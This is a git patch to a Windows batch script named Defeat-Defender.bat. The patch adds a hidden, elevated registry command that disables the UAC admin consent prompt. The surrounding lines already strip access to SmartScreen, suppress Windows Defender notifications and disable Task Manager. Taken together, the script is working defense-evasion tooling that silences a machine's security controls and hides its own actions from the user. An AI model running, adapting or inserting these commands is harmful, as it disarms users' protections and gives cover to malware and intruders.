From 78d859224a2c69d96919d300cb916fbff26c9e9e Mon Sep 17 00:00:00 2001 From: Ali Milani <59066012+AliMilani@users.noreply.github.com> Date: Fri, 31 Dec 2021 12:01:14 +0330 Subject: [PATCH] Disable UAC --- Defeat-Defender.bat | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Defeat-Defender.bat b/Defeat-Defender.bat index bbf730f..ffbb3ce 100644 --- a/Defeat-Defender.bat +++ b/Defeat-Defender.bat @@ -38,6 +38,8 @@ set pop=%systemroot% NSudo -U:T -ShowWindowMode:Hide icacls "%pop%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18 +NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f + NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f